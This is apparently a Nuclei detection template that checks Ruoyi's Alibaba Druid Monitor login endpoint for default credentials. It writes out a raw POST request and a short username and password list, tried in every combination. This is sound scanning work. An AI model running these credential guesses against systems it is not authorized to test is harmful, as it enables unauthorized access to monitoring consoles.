id: ruoyi-druid-default-login

info:
  name: Ruoyi Druid Monitor - Default Login
  author: pikpikcu,leadlife
  severity: high
  description: Ruoyi Alibaba Druid Monitor default login information (admin/admin) was discovered.
  metadata:
    max-request: 1
  tags: druid,alibaba,default-login,ruoyi

http:
  - raw:
      - |
        POST /prod-api/druid/submitLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginUsername={{username}}&loginPassword={{password}}

    payloads:
      username:
        - ry
        - admin
        - druid
        - ruoyi
      password:
        - admin
        - druid
        - 123456
        - admin123
    attack: clusterbomb

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "^success$"

# digest: 4a0a0047304502203dfdfa52e3c78cf6b97da6c9696cbd67765e254ee413a412325e57b4cd454ef0022100d443785f6f2d4979660305541336a2f74f56b2c5efacb43b07928e7831b0bc03:922c64590222798bb761d5b6d8e72950
